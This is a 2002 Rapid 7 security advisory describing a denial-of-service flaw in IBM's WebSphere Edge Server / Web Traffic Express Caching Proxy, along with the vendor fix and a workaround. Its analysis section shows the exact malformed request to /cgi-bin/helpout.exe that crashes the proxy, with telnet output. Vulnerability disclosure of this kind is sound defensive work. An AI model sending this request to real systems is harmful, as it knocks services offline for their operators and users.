|
COMMAND IBM WebSphere Edge Server Caching Proxy Denial of Service SYSTEMS AFFECTED IBM Web Traffic Express Caching Proxy Server v4.x (bundled with IBM WebSphere Edge Server v2.0) IBM Web Traffic Express Caching Proxy Server v3.6 PROBLEM In Rapid 7 Advisory [#R7-0007] http://www.rapid7.com/ : The Caching Proxy component of IBM's WebSphere Edge Server v2.0 is vulnerable to a denial-of-service attack against one of the default CGI programs. A malformed HTTP request for /cgi-bin/helpout.exe will cause ibmproxy.exe to crash and cease functioning. IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server v2.0. IBM Web Traffic Express v3.6 and earlier were separately shipping products. Detailed analysis The proxy server will crash when /cgi-bin/helpout.exe is the subject of an HTTP request that does not include an HTTP version specifier at the end of the request line. If you include a version specifier (e.g. "HTTP/1.0"), helpout.exe will successfully serve up a blank page. [~] $ telnet localhost 80 Trying 127.0.0.1... Connected to proxy.victim.com. Escape character is '^]'. GET /cgi-bin/helpout.exe HTTP/1.0 HTTP/1.1 200 Document follows Pragma: no-cache Last-Modified: Fri, 18 Oct 2002 16:54:40 GMT Content-Type: text/html Accept-Ranges: bytes Connection: close Date: Fri, 18 Oct 2002 16:54:40 GMT Server: IBM-PROXY-WTE/2.0 Connection closed by foreign host. If you send a request with no version specifier, or with a version specifier that does not include a forward slash (e.g. "HTTP" or ""), ibmproxy.exe will crash, closing all connections: [~] $ telnet localhost 80 Trying 127.0.0.1... Connected to proxy.victim.com. Escape character is '^]'. GET /cgi-bin/helpout.exe HTTP Connection closed by foreign host. An exception dialog will be displayed on the server console, reading: ibmproxy.exe - Application Error The instruction at "0x002662ac" referenced memory at "0x00000000". The memory could not be "read". The access violation occurs within the WHTTPD.DLL module. Contact Information Rapid 7 Security Advisories Email: advisory@rapid7.com Web: http://www.rapid7.com/ Phone: +1 (212) 558-8700 SOLUTION IBM customers should install Caching Proxy efix build 4.0.1.26 or higher. Efix builds can be downloaded from IBM's secure FTP site. For more information on obtaining efix builds, contact IBM support with the APAR number listed above. This fix has also been ported back to the Web Traffic Express v3.6 code base. Customers running v3.6 should contact IBM support for more information on how to upgrade to a newer build. As a temporary workaround, you can move the file /cgi-bin/helpout.exe to a non-executable directory until the fix has been applied. Vendor status and information http://www-3.ibm.com/software/webservers/edgeserver/index.html IBM was notified of this issue and has released efix build number 4.0.1.26 for Caching Proxy Server v4.x, which fixes this issue and other security issues (see Rapid 7 advisory R7-0008 for more information: http://www.rapid7.com/advisories/R7-0008.txt ). IBM is tracking this issue as APAR# IY35970. Disclaimer and Copyright Rapid 7, Inc. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.